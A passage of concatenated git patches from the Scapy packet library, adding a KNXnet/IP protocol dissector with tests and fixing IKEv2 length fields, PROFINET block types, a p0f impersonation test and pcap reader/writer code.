ShortField, \ + ByteEnumField, IPField, StrFixedLenField, MACField, XBitField, \ + PacketListField, FieldLenField, \ + StrLenField, BitEnumField, BitField, ConditionalField +from scapy.packet import Packet, bind_layers, bind_bottom_up, Padding +from scapy.layers.inet import UDP + +# KNX CODES + +# KNX Standard v2.1 - 03_08_02 p20 +SERVICE_IDENTIFIER_CODES = { + 0x0201: "SEARCH_REQUEST", + 0x0202: "SEARCH_RESPONSE", + 0x0203: "DESCRIPTION_REQUEST", + 0x0204: "DESCRIPTION_RESPONSE", + 0x0205: "CONNECT_REQUEST", + 0x0206: "CONNECT_RESPONSE", + 0x0207: "CONNECTIONSTATE_REQUEST", + 0x0208: "CONNECTIONSTATE_RESPONSE", + 0x0209: "DISCONNECT_REQUEST", + 0x020A: "DISCONNECT_RESPONSE", + 0x0310: "CONFIGURATION_REQUEST", + 0x0311: "CONFIGURATION_ACK", + 0x0420: "TUNNELING_REQUEST", + 0x0421: "TUNNELING_ACK" +} + +# KNX Standard v2.1 - 03_08_02 p39 +HOST_PROTOCOL_CODES = { + 0x01: "IPV4_UDP", + 0x02: "IPV4_TCP" +} + +# KNX Standard v2.1 - 03_08_02 p23 +DESCRIPTION_TYPE_CODES = { + 0x01: "DEVICE_INFO", + 0x02: "SUPP_SVC_FAMILIES", + 0x03: "IP_CONFIG", + 0x04: "IP_CUR_CONFIG", + 0x05: "KNX_ADDRESSES", + 0x06: "Reserved", + 0xFE: "MFR_DATA", + 0xFF: "not used" +} + +# KNX Standard v2.1 - 03_08_02 p30 +CONNECTION_TYPE_CODES = { + 0x03: "DEVICE_MANAGEMENT_CONNECTION", + 0x04: "TUNNEL_CONNECTION", + 0x06: "REMLOG_CONNECTION", + 0x07: "REMCONF_CONNECTION", + 0x08: "OBJSVR_CONNECTION" +} + +# KNX Standard v2.1 - 03_08_04 +MESSAGE_CODES = { + 0x11: "L_Data.req", + 0x2e: "L_Data.con", + 0xFC: "M_PropRead.req", + 0xFB: "M_PropRead.con", + 0xF6: "M_PropWrite.req", + 0xF5: "M_PropWrite.con" +} + +# KNX Standard v2.1 - 03_08_02 p24 +KNX_MEDIUM_CODES = { + 0x01: "reserved", + 0x02: "TP1", + 0x04: "PL110", + 0x08: "reserved", + 0x10: "RF", + 0x20: "KNX IP" +} + +# KNX Standard v2.1 - 03_03_07 p9 +KNX_ACPI_CODES = { + 0: "GroupValueRead", + 1: "GroupValueResp", + 2: "GroupValueWrite", + 3: "IndAddrWrite", + 4: "IndAddrRead", + 5: "IndAddrResp", + 6: "AdcRead", + 7: "AdcResp" +} + +CEMI_OBJECT_TYPES = { + 0: "DEVICE", + 11: "IP PARAMETER_OBJECT" +} + +# KNX Standard v2.1 - 03_05_01 p25 +CEMI_PROPERTIES = { + 12: "PID_MANUFACTURER_ID", + 51: "PID_PROJECT_INSTALLATION_ID", + 52: "PID_KNX_INDIVIDUAL_ADDRESS", + 53: "PID_ADDITIONAL_INDIVIDUAL_ADDRESSES", + 54: "PID_CURRENT_IP_ASSIGNMENT_METHOD", + 55: "PID_IP_ASSIGNMENT_METHOD", + 56: "PID_IP_CAPABILITIES", + 57: "PID_CURRENT_IP_ADDRESS", + 58: "PID_CURRENT_SUBNET_MASK", + 59: "PID_CURRENT_DEFAULT_GATEWAY", + 60: "PID_IP_ADDRESS", + 61: "PID_SUBNET_MASK", + 62: "PID_DEFAULT_GATEWAY", + 63: "PID_DHCP_BOOTP_SERVER", + 64: "PID_MAC_ADDRESS", + 65: "PID_SYSTEM_SETUP_MULTICAST_ADDRESS", + 66: "PID_ROUTING_MULTICAST_ADDRESS", + 67: "PID_TTL", + 68: "PID_KNXNETIP_DEVICE_CAPABILITIES", + 69: "PID_KNXNETIP_DEVICE_STATE", + 70: "PID_KNXNETIP_ROUTING_CAPABILITIES", + 71: "PID_PRIORITY_FIFO_ENABLED", + 72: "PID_QUEUE_OVERFLOW_TO_IP", + 73: "PID_QUEUE_OVERFLOW_TO_KNX", + 74: "PID_MSG_TRANSMIT_TO_IP", + 75: "PID_MSG_TRANSMIT_TO_KNX", + 76: "PID_FRIENDLY_NAME", + 78: "PID_ROUTING_BUSY_WAIT_TIME" +} + + +# KNX SPECIFIC FIELDS + +# KNX Standard v2.1 - 03_05_01 p.17 +class KNXAddressField(ShortField): + def i2repr(self, pkt, x): + if x is None: + return None + else: + return "%d.%d.%d" % ((x >> 12) & 0xf, (x >> 8) & 0xf, (x & 0xff)) + + def any2i(self, pkt, x): + if isinstance(x, str): + try: + a, b, c = map(int, x.split(".")) + x = (a << 12) | (b << 8) | c + except ValueError: + raise ValueError(x) + return ShortField.any2i(self, pkt, x) + + +# KNX Standard v2.1 - 03_05_01 p.18 +class KNXGroupField(ShortField): + def i2repr(self, pkt, x): + return "%d/%d/%d" % ((x >> 11) & 0x1f, (x >> 8) & 0x7, (x & 0xff)) + + def any2i(self, pkt, x): + if isinstance(x, str): + try: + a, b, c = map(int, x.split("/")) + x = (a << 11) | (b << 8) | c + except ValueError: + raise ValueError(x) + return ShortField.any2i(self, pkt, x) + + +# KNX PLACEHOLDERS + +# KNX Standard v2.1 - 03_08_02 p21 +class HPAI(Packet): + name = "HPAI" + fields_desc = [ + ByteField("structure_length", None), + ByteEnumField("host_protocol", 0x01, HOST_PROTOCOL_CODES), + IPField("ip_address", None), + ShortField("port", None) + ] + + def post_build(self, p, pay): + if self.structure_length is None: + p = struct.pack("!B", len(p)) + p[1:] + return p + pay + + +# DIB, KNX Standard v2.1 - 03_08_02 p22 +class ServiceFamily(Packet): + name = "Service Family" + fields_desc = [ + ByteField("id", None), + ByteField("version", None) + ] + + +# Different DIB types depends on the "description_type_code" field +# Defining a generic DIB packet and differentiating with `dispatch_hook` or +# `MultipleTypeField` may better fit KNX specs +class DIBDeviceInfo(Packet): + name = "DIB: DEVICE_INFO" + fields_desc = [ + ByteField("structure_length", None), + ByteEnumField("description_type", 0x01, DESCRIPTION_TYPE_CODES), + ByteEnumField("knx_medium", 0x02, KNX_MEDIUM_CODES), + ByteField("device_status", None), + KNXAddressField("knx_address", None), + ShortField("project_installation_identifier", None), + XBitField("device_serial_number", None, 48), + IPField("device_multicast_address", None), + MACField("device_mac_address", None), + StrFixedLenField("device_friendly_name", None, 30) + ] + + def post_build(self, p, pay): + if self.structure_length is None: + p = struct.pack("!B", len(p)) + p[1:] + return p + pay + + +class DIBSuppSvcFamilies(Packet): + name = "DIB: SUPP_SVC_FAMILIES" + fields_desc = [ + ByteField("structure_length", 0x02), + ByteEnumField("description_type", 0x02, DESCRIPTION_TYPE_CODES), + ConditionalField( + PacketListField("service_family", + ServiceFamily(), + ServiceFamily, + length_from=lambda pkt: + pkt.structure_length - 0x02), + lambda pkt: pkt.structure_length > 0x02) + ] + + def post_build(self, p, pay): + if self.structure_length is None: + p = struct.pack("!B", len(p)) + p[1:] + return p + pay + + +# CRI and CRD, KNX Standard v2.1 - 03_08_02 p21 + +class TunnelingConnection(Packet): + name = "Tunneling Connection" + fields_desc = [ + ByteField("knx_layer", 0x02), + ByteField("reserved", None) + ] + + +class CRDTunnelingConnection(Packet): + name = "CRD Tunneling Connection" + fields_desc = [ + KNXAddressField("knx_individual_address", None) + ] + + +class CRI(Packet): + name = "CRI (Connection Request Information)" + fields_desc = [ + ByteField("structure_length", 0x02), + ByteEnumField("connection_type", 0x03, CONNECTION_TYPE_CODES), + ConditionalField(PacketField("connection_data", + TunnelingConnection(), + TunnelingConnection), + lambda pkt: pkt.connection_type == 0x04) + ] + + def post_build(self, p, pay): + if self.structure_length is None: + p = struct.pack("!B", len(p)) + p[1:] + return p + pay + + +class CRD(Packet): + name = "CRD (Connection Response Data)" + fields_desc = [ + ByteField("structure_length", 0x00), + ByteEnumField("connection_type", 0x03, CONNECTION_TYPE_CODES), + ConditionalField(PacketField("connection_data", + CRDTunnelingConnection(), + CRDTunnelingConnection), + lambda pkt: pkt.connection_type == 0x04) + ] + + def post_build(self, p, pay): + if self.structure_length is None: + p = struct.pack("!B", len(p)) + p[1:] + return p + pay + + +# cEMI blocks + +class LcEMI(Packet): + name = "L_cEMI" + fields_desc = [ + FieldLenField("additional_information_length", 0, fmt="B", + length_of="additional_information"), + StrLenField("additional_information", None, + length_from=lambda pkt: pkt.additional_information_length), + # Controlfield 1 (1 byte made of 8*1 bits) + BitEnumField("frame_type", 1, 1, { + 1: "standard" + }), + BitField("reserved_1", 0, 1), + BitField("repeat_on_error", 1, 1), + BitEnumField("broadcast_type", 1, 1, { + 1: "domain" + }), + BitEnumField("priority", 3, 2, { + 3: "low" + }), + BitField("ack_request", 0, 1), + BitField("confirmation_error", 0, 1), + # Controlfield 2 (1 byte made of 1+3+4 bits) + BitEnumField("address_type", 1, 1, { + 1: "group" + }), + BitField("hop_count", 6, 3), + BitField("extended_frame_format", 0, 4), + KNXAddressField("source_address", None), + KNXGroupField("destination_address", "1/2/3"), + FieldLenField("npdu_length", 0x01, fmt="B", length_of="data"), + # TPCI and APCI (2 byte made of 1+1+4+4+6 bits) + BitEnumField("packet_type", 0, 1, { + 0: "data" + }), + BitEnumField("sequence_type", 0, 1, { + 0: "unnumbered" + }), + BitField("reserved_2", 0, 4), + BitEnumField("acpi", 2, 4, KNX_ACPI_CODES), + BitField("data", 0, 6) + + ] + + +class DPcEMI(Packet): + name = "DP_cEMI" + fields_desc = [ + # see if best representation is str or hex + ShortField("object_type", None), + ByteField("object_instance", 1), + ByteField("property_id", None), + BitField("number_of_elements", 1, 4), + BitField("start_index", None, 12) + ] + + +class CEMI(Packet): + name = "CEMI" + fields_desc = [ + ByteEnumField("message_code", None, MESSAGE_CODES), + MultipleTypeField( + [ + (PacketField("cemi_data", LcEMI(), LcEMI), + lambda pkt: pkt.message_code == 0x11), + (PacketField("cemi_data", LcEMI(), LcEMI), + lambda pkt: pkt.message_code == 0x2e), + (PacketField("cemi_data", DPcEMI(), DPcEMI), + lambda pkt: pkt.message_code == 0xFC), + (PacketField("cemi_data", DPcEMI(), DPcEMI), + lambda pkt: pkt.message_code == 0xFB), + (PacketField("cemi_data", DPcEMI(), DPcEMI), + lambda pkt: pkt.message_code == 0xF6), + (PacketField("cemi_data", DPcEMI(), DPcEMI), + lambda pkt: pkt.message_code == 0xF5) + ], + PacketField("cemi_data", LcEMI(), LcEMI) + ) + ] + + +# KNX SERVICES + +# KNX Standard v2.1 - 03_08_02 p28 +class KNXSearchRequest(Packet): + name = "SEARCH_REQUEST", + fields_desc = [ + PacketField("discovery_endpoint", HPAI(), HPAI) + ] + + +# KNX Standard v2.1 - 03_08_02 p28 +class KNXSearchResponse(Packet): + name = "SEARCH_RESPONSE", + fields_desc = [ + PacketField("control_endpoint", HPAI(), HPAI), + PacketField("device_info", DIBDeviceInfo(), DIBDeviceInfo), + PacketField("supported_service_families", DIBSuppSvcFamilies(), + DIBSuppSvcFamilies) + ] + + +# KNX Standard v2.1 - 03_08_02 p29 +class KNXDescriptionRequest(Packet): + name = "DESCRIPTION_REQUEST" + fields_desc = [ + PacketField("control_endpoint", HPAI(), HPAI) + ] + + +# KNX Standard v2.1 - 03_08_02 p29 +class KNXDescriptionResponse(Packet): + name = "DESCRIPTION_RESPONSE" + fields_desc = [ + PacketField("device_info", DIBDeviceInfo(), DIBDeviceInfo), + PacketField("supported_service_families", DIBSuppSvcFamilies(), + DIBSuppSvcFamilies) + # TODO: this is an optional field in KNX specs, + # => Add conditions to take it into account + # PacketField("other_device_info", DIBDeviceInfo(), DIBDeviceInfo) + ] + + +# KNX Standard v2.1 - 03_08_02 p30 +class KNXConnectRequest(Packet): + name = "CONNECT_REQUEST" + fields_desc = [ + PacketField("control_endpoint", HPAI(), HPAI), + PacketField("data_endpoint", HPAI(), HPAI), + PacketField("connection_request_information", CRI(), CRI) + ] + + +# KNX Standard v2.1 - 03_08_02 p31 +class KNXConnectResponse(Packet): + name = "CONNECT_RESPONSE" + fields_desc = [ + ByteField("communication_channel_id", None), + ByteField("status", None), + PacketField("data_endpoint", HPAI(), HPAI), + PacketField("connection_response_data_block", CRD(), CRD) + ] + + +# KNX Standard v2.1 - 03_08_02 p32 +class KNXConnectionstateRequest(Packet): + name = "CONNECTIONSTATE_REQUEST" + fields_desc = [ + ByteField("communication_channel_id", None), + ByteField("reserved", None), + PacketField("control_endpoint", HPAI(), HPAI) + ] + + +# KNX Standard v2.1 - 03_08_02 p32 +class KNXConnectionstateResponse(Packet): + name = "CONNECTIONSTATE_RESPONSE" + fields_desc = [ + ByteField("communication_channel_id", None), + ByteField("status", 0x00) + ] + + +# KNX Standard v2.1 - 03_08_02 p33 +class KNXDisconnectRequest(Packet): + name = "DISCONNECT_REQUEST" + fields_desc = [ + ByteField("communication_channel_id", 0x01), + ByteField("reserved", None), + PacketField("control_endpoint", HPAI(), HPAI) + ] + + +# KNX Standard v2.1 - 03_08_02 p34 +class KNXDisconnectResponse(Packet): + name = "DISCONNECT_RESPONSE" + fields_desc = [ + ByteField("communication_channel_id", None), + ByteField("status", 0x00) + ] + + +# KNX Standard v2.1 - 03_08_03 p22 +class KNXConfigurationRequest(Packet): + name = "CONFIGURATION_REQUEST" + fields_desc = [ + ByteField("structure_length", 0x04), + ByteField("communication_channel_id", 0x01), + ByteField("sequence_counter", None), + ByteField("reserved", None), + PacketField("cemi", CEMI(), CEMI) + ] + + def post_build(self, p, pay): + if self.structure_length is None: + p = struct.pack("!B", len(p[:4])) + p[1:] + return p + pay + + +# KNX Standard v2.1 - 03_08_03 p22 +class KNXConfigurationACK(Packet): + name = "CONFIGURATION_ACK" + fields_desc = [ + ByteField("structure_length", None), + ByteField("communication_channel_id", 0x01), + ByteField("sequence_counter", None), + ByteField("status", None) + ] + + def post_build(self, p, pay): + if self.structure_length is None: + p = struct.pack("!B", len(p)) + p[1:] + return p + pay + + +# KNX Standard v2.1 - 03_08_04 p.17 +class KNXTunnelingRequest(Packet): + name = "TUNNELING_REQUEST" + fields_desc = [ + ByteField("structure_length", 0x04), + ByteField("communication_channel_id", 0x01), + ByteField("sequence_counter", None), + ByteField("reserved", None), + PacketField("cemi", CEMI(), CEMI) + ] + + def post_build(self, p, pay): + if self.structure_length is None: + p = struct.pack("!B", len(p[:4])) + p[1:] + return p + pay + + +# KNX Standard v2.1 - 03_08_04 p.18 +class KNXTunnelingACK(Packet): + name = "TUNNELING_ACK" + fields_desc = [ + ByteField("structure_length", None), + ByteField("communication_channel_id", 0x01), + ByteField("sequence_counter", None), + ByteField("status", None) + ] + + def post_build(self, p, pay): + if self.structure_length is None: + p = struct.pack("!B", len(p)) + p[1:] + return p + pay + + +# KNX FRAME + +# we made the choice to define a KNX service as a payload for a KNX Header +# it could also be possible to define the body as a conditional PacketField +# contained after header + +class KNX(Packet): + name = "KNXnet/IP" + fields_desc = [ + ByteField("header_length", None), + XByteField("protocol_version", 0x10), + ShortEnumField("service_identifier", None, SERVICE_IDENTIFIER_CODES), + ShortField("total_length", None) + ] + + def post_build(self, p, pay): + # computes header_length + if self.header_length is None: + p = struct.pack("!B", len(p)) + p[1:] + # computes total_length + if self.total_length is None: + p = p[:-2] + struct.pack("!H", len(p) + len(pay)) + return p + pay + + +# LAYERS BINDING +bind_bottom_up(UDP, KNX, dport=3671) +bind_bottom_up(UDP, KNX, sport=3671) +bind_layers(UDP, KNX, sport=3671, dport=3671) + +bind_layers(KNX, KNXSearchRequest, service_identifier=0x0201) +bind_layers(KNX, KNXSearchResponse, service_identifier=0x0202) +bind_layers(KNX, KNXDescriptionRequest, service_identifier=0x0203) +bind_layers(KNX, KNXDescriptionResponse, service_identifier=0x0204) +bind_layers(KNX, KNXConnectRequest, service_identifier=0x0205) +bind_layers(KNX, KNXConnectResponse, service_identifier=0x0206) +bind_layers(KNX, KNXConnectionstateRequest, service_identifier=0x0207) +bind_layers(KNX, KNXConnectionstateResponse, service_identifier=0x0208) +bind_layers(KNX, KNXDisconnectResponse, service_identifier=0x020A) +bind_layers(KNX, KNXDisconnectRequest, service_identifier=0x0209) +bind_layers(KNX, KNXConfigurationRequest, service_identifier=0x0310) +bind_layers(KNX, KNXConfigurationACK, service_identifier=0x0311) +bind_layers(KNX, KNXTunnelingRequest, service_identifier=0x0420) +bind_layers(KNX, KNXTunnelingACK, service_identifier=0x0421) + +# we bind every layer to Padding in order to delete their payloads +# (from https://github.com/secdev/scapy/issues/360) +# we could also define a new Packet class with no payload and +# inherit every KNX packet from it : +# class _KNXBodyNoPayload(Packet): +# +# def extract_padding(self, s): +# return b"", None + +bind_layers(HPAI, Padding) +bind_layers(ServiceFamily, Padding) +bind_layers(DIBDeviceInfo, Padding) +bind_layers(DIBSuppSvcFamilies, Padding) +bind_layers(TunnelingConnection, Padding) +bind_layers(CRDTunnelingConnection, Padding) +bind_layers(CRI, Padding) +bind_layers(CRD, Padding) +bind_layers(LcEMI, Padding) +bind_layers(DPcEMI, Padding) +bind_layers(CEMI, Padding) + +bind_layers(KNXSearchRequest, Padding) +bind_layers(KNXSearchResponse, Padding) +bind_layers(KNXDescriptionRequest, Padding) +bind_layers(KNXDescriptionResponse, Padding) +bind_layers(KNXConnectRequest, Padding) +bind_layers(KNXConnectResponse, Padding) +bind_layers(KNXConnectionstateRequest, Padding) +bind_layers(KNXConnectionstateResponse, Padding) +bind_layers(KNXDisconnectRequest, Padding) +bind_layers(KNXDisconnectResponse, Padding) +bind_layers(KNXConfigurationRequest, Padding) +bind_layers(KNXConfigurationACK, Padding) +bind_layers(KNXTunnelingRequest, Padding) +bind_layers(KNXTunnelingACK, Padding) diff --git a/test/contrib/knx.uts b/test/contrib/knx.uts new file mode 100644 index 00000000000..39d00314c93 --- /dev/null +++ b/test/contrib/knx.uts @@ -0,0 +1,75 @@ +% knx layer test campaign + ++ Syntax check += Import the knx layer +from scapy.contrib.knx import * + ++ Test KNX Header += Header default values +pkt = KNX() +assert(raw(pkt) == b'\x06\x10\x00\x00\x00\x06') + += KNX Header payload length calculation +pkt = KNX(service_identifier=0x0203)/KNXDescriptionRequest() +assert(raw(pkt)[4:6] == b'\x00\x0e') + += KNX Header Guess Payload KNXSearchRequest +p = KNX(b'\x06\x10\x02\x01\x00\x0e\x08\x01\x00\x00\x00\x00\x00\x00') +assert(isinstance(p.payload, KNXSearchRequest)) + += KNX Header Guess Payload KNXSearchResponse +p = KNX(b'\x06\x10\x02\x02\x00F\x08\x01\x00\x00\x00\x00\x00\x006\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x02') +assert(isinstance(p.payload, KNXSearchResponse)) + += KNX Header Guess Payload KNXDescriptionRequest +p = KNX(b'\x06\x10\x02\x03\x00\x0e\x08\x01\x00\x00\x00\x00\x00\x00') +assert(isinstance(p.payload, KNXDescriptionRequest)) + += KNX Header Guess Payload KNXDescriptionResponse +p = KNX(b'\x06\x10\x02\x04\x00>6\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x02') +assert(isinstance(p.payload, KNXDescriptionResponse)) + += KNX Header Guess Payload KNXConnectRequest +p = KNX(b'\x06\x10\x02\x05\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x02\x03') +assert(isinstance(p.payload, KNXConnectRequest)) + += KNX Header Guess Payload KNXConnectResponse +p = KNX(b'\x06\x10\x02\x06\x00\x12\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x02\x03') +assert(isinstance(p.payload, KNXConnectResponse)) + += KNX Header Guess Payload KNXConnectionstateRequest +p = KNX(b'\x06\x10\x02\x07\x00\x10\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00') +assert(isinstance(p.payload, KNXConnectionstateRequest)) + += KNX Header Guess Payload KNXConnectionstateResponse +p = KNX(b'\x06\x10\x02\x08\x00\x08\x00\x00') +assert(isinstance(p.payload, KNXConnectionstateResponse)) + += KNX Header Guess Payload KNXDisconnectRequest +p = KNX(b'\x06\x10\x02\t\x00\x10\x01\x00\x08\x01\x00\x00\x00\x00\x00\x00') +assert(isinstance(p.payload, KNXDisconnectRequest)) + += KNX Header Guess Payload KNXDisconnectResponse +p = KNX(b'\x06\x10\x02\n\x00\x08\x00\x00') +assert(isinstance(p.payload, KNXDisconnectResponse)) + += KNX Header Guess Payload KNXConfigurationRequest +p = KNX(b'\x06\x10\x03\x10\x00\x15\x04\x01\x00\x00\x00\x00\xbc\xe0\x00\x00\n\x03\x01\x00\x80') +assert(isinstance(p.payload, KNXConfigurationRequest)) + += KNX Header Guess Payload KNXConfigurationACK +p = KNX(b'\x06\x10\x03\x11\x00\n\x04\x01\x00\x00') +assert(isinstance(p.payload, KNXConfigurationACK)) + += KNX Header Guess Payload KNXTunnelingRequest +p = KNX(b'\x06\x10\x04 \x00\x15\x04\x01\x00\x00\x00\x00\xbc\xe0\x00\x00\n\x03\x01\x00\x80') +assert(isinstance(p.payload, KNXTunnelingRequest)) + += KNX Header Guess Payload KNXTunnelingACK +p = KNX(b'\x06\x10\x04!\x00\n\x04\x01\x00\x00') +assert(isinstance(p.payload, KNXTunnelingACK)) + ++ Test layer binding += Destination port + + From d5812c302f36d43af27903f1b6cb45f028747d71 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 3 Aug 2021 21:09:37 +0200 Subject: [PATCH 0620/1632] Make p0f test work with all p0f versions --- test/p0f.uts | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/test/p0f.uts b/test/p0f.uts index bf257a0c1f0..e802d7b63f1 100644 --- a/test/p0f.uts +++ b/test/p0f.uts @@ -75,11 +75,8 @@ assert fingerprint_mtu(pkt) == "Ethernet or modem" = Check that the impersonated packet is properly detected by p0f ~ netaccess -sig = "*:64:0:*:mss*20,10:mss,sok,ts,nop,ws:df,id+:0" -pkt = p0f_impersonate(IP()/TCP(), signature=sig) -imp = p0f(pkt) -print(imp) -assert imp == (("s", "unix", "Linux", "3.11 and newer"), 0, False) +pkt = p0f_impersonate(IP()/TCP(), osgenre="Linux", osdetails="3.11 and newer") +assert p0f(pkt) == (("s", "unix", "Linux", "3.11 and newer"), 0, False) = Impersonate when window size must be multiple of some integer sig = "*:64:0:1460:%8192,0:mss,nop,ws::0" From d4c9a50dc1edd563f87f04dd55597435471c572c Mon Sep 17 00:00:00 2001 From: Jakob Rieck <0xbf00@users.noreply.github.com> Date: Wed, 4 Aug 2021 10:23:20 +0200 Subject: [PATCH 0621/1632] Fixes incorrect IKEv2 length calculations (fixes #3311) (#3312) * Fixes incorrect IKEv2 length calculations * Adds unit test for IKEv2 incorrect length calculations --- scapy/contrib/ikev2.py | 4 ++-- test/contrib/ikev2.uts | 13 +++++++++++++ 2 files changed, 15 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 7799fd1e4f7..9d8d8814d58 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -750,7 +750,7 @@ class IKEv2_payload_CERT_CRT(IKEv2_payload_CERT): fields_desc = [ ByteEnumField("next_payload", None, IKEv2_payload_type), ByteField("res", 0), - FieldLenField("length", None, "x509Cert", "H", adjust=lambda pkt, x: x + len(pkt.x509Cert) + 5), # noqa: E501 + FieldLenField("length", None, "x509Cert", "H", adjust=lambda pkt, x: x + 5), # noqa: E501 ByteEnumField("cert_type", 4, IKEv2CertificateEncodings), PacketLenField("x509Cert", X509_Cert(''), X509_Cert, length_from=lambda x:x.length - 5), # noqa: E501 ] @@ -761,7 +761,7 @@ class IKEv2_payload_CERT_CRL(IKEv2_payload_CERT): fields_desc = [ ByteEnumField("next_payload", None, IKEv2_payload_type), ByteField("res", 0), - FieldLenField("length", None, "x509CRL", "H", adjust=lambda pkt, x: x + len(pkt.x509CRL) + 5), # noqa: E501 + FieldLenField("length", None, "x509CRL", "H", adjust=lambda pkt, x: x + 5), # noqa: E501 ByteEnumField("cert_type", 7, IKEv2CertificateEncodings), PacketLenField("x509CRL", X509_CRL(''), X509_CRL, length_from=lambda x:x.length - 5), # noqa: E501 ] diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index d03e055d7f9..607f4a312f4 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -92,6 +92,19 @@ assert isinstance(a, IKEv2_payload_CERT_CRL) assert isinstance(b, IKEv2_payload_CERT_STR) assert isinstance(c, IKEv2_payload_CERT_CRT) += Test Certs length calculations +## For the length calculations see Figure 12 in RFC 7296 +a = IKEv2_payload_CERT_CRT(raw(IKEv2_payload_CERT_CRT())) +assert len(a.x509Cert) > 0 +assert a.length == len(a.x509Cert) + 5 + +b = IKEv2_payload_CERT_CRL(raw(IKEv2_payload_CERT_CRL())) +assert len(b.x509CRL) > 0 +assert b.length == len(b.x509CRL) + 5 + +c = IKEv2_payload_CERT_STR(raw(IKEv2_payload_CERT_STR(cert_data=b'dummy'))) +assert c.length == len(c.cert_data) + 5 + = Test TrafficSelector detection a = TrafficSelector(raw(IPv4TrafficSelector())) From 1975a7e83710ce47742ad9b71e68fc7ee3c0b84b Mon Sep 17 00:00:00 2001 From: Chris Packham Date: Mon, 16 Aug 2021 12:00:34 +1200 Subject: [PATCH 0622/1632] contrib/pnio: Use correct block types for AlarmNotification_High/Low According to table 514 of IEC 61158-6-10 the correct BlockType for AlarmNotification_High is 0x0001 and AlarmNotification_Low is 0x0002. Signed-off-by: Chris Packham --- scapy/contrib/pnio_rpc.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index ef51bbf972d..0de11dcb6e0 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -37,8 +37,8 @@ # Block Packet BLOCK_TYPES_ENUM = { - 0x0000: "AlarmNotification_High", - 0x0001: "AlarmNotification_Low", + 0x0001: "AlarmNotification_High", + 0x0002: "AlarmNotification_Low", 0x0008: "IODWriteReqHeader", 0x0009: "IODReadReqHeader", 0x0010: "DiagnosisData", From 5ba486b387bb19c95e036afafd8b6d153382c036 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 1 Aug 2021 14:03:15 +0200 Subject: [PATCH 0623/1632] Fix RawPcap[Writer/Reader] --- scapy/utils.py | 44 ++++++++++++++++++++++++++++++++------------ test/regression.uts | 20 ++++++++++++++++++++ 2 files changed, 52 insertions(+), 12 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index b1e35abd399..1979495b7c9 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1194,6 +1194,10 @@ def open(fname # type: Union[IO[bytes], str] class RawPcapReader: """A stateful pcap reader. Each packet is returned as a string""" + # TODO: use Generics to properly type the various readers. + # As of right now, RawPcapReader is typed as if it returned packets + # because all of its child do. Fix that + nonblocking_socket = True PacketMetadata = collections.namedtuple("PacketMetadata", ["sec", "usec", "wirelen", "caplen"]) # noqa: E501 @@ -1237,10 +1241,13 @@ def next(self): implement the iterator protocol on a set of packets in a pcap file """ try: - return self.read_packet() + return self._read_packet() # type: ignore except EOFError: raise StopIteration - __next__ = next + + def __next__(self): + # type: () -> Packet + return self.next() def _read_packet(self, size=MTU): # type: (int) -> Tuple[bytes, RawPcapReader.PacketMetadata] @@ -1259,9 +1266,9 @@ def _read_packet(self, size=MTU): def read_packet(self, size=MTU): # type: (int) -> Packet - return cast( - "Packet", - self._read_packet()[0] + raise Exception( + "Cannot call read_packet() in RawPcapReader. Use " + "_read_packet()" ) def dispatch(self, @@ -1277,12 +1284,6 @@ def dispatch(self, for p in self: callback(p) - def read_all(self, count=-1): - # type: (int) -> PacketList - res = self._read_all(count) - from scapy import plist - return plist.PacketList(res, name=os.path.basename(self.filename)) - def _read_all(self, count=-1): # type: (int) -> List[Packet] """return a list of all packets in the pcap file @@ -1372,6 +1373,19 @@ def recv(self, size=MTU): # type: (int) -> Packet return self.read_packet(size=size) + def next(self): + # type: () -> Packet + try: + return self.read_packet() + except EOFError: + raise StopIteration + + def read_all(self, count=-1): + # type: (int) -> PacketList + res = self._read_all(count) + from scapy import plist + return plist.PacketList(res, name=os.path.basename(self.filename)) + class RawPcapNgReader(RawPcapReader): """A stateful pcapng reader. Each packet is returned as @@ -1594,7 +1608,7 @@ def _read_block_pkt(self, block, size): wirelen=wirelen)) -class PcapNgReader(RawPcapNgReader, _SuperSocket): +class PcapNgReader(RawPcapNgReader, PcapReader, _SuperSocket): alternative = PcapReader @@ -1714,6 +1728,12 @@ def _write_header(self, pkt): finally: g.close() + if self.linktype is None: + raise ValueError( + "linktype could not be guessed. " + "Please pass a linktype while creating the writer" + ) + self.f.write(struct.pack(self.endian + "IHHIIII", 0xa1b23c4d if self.nano else 0xa1b2c3d4, # noqa: E501 2, 4, 0, 0, self.snaplen, self.linktype)) self.f.flush() diff --git a/test/regression.uts b/test/regression.uts index 95c19988733..340f4558ab2 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2063,11 +2063,31 @@ l = [ p for p in RawPcapReader(f) ] assert len(l) == 1 = Check RawPcapReader on pcap +~ pcap fd = get_temp_file() wrpcap(fd, [Ether()/IP()/ICMP()]) assert len([p for p in RawPcapReader(fd)]) == 1 +for (x, y) in RawPcapReader(fd): + pass + += Check RawPcapWriter +~ pcap + +# GH3256 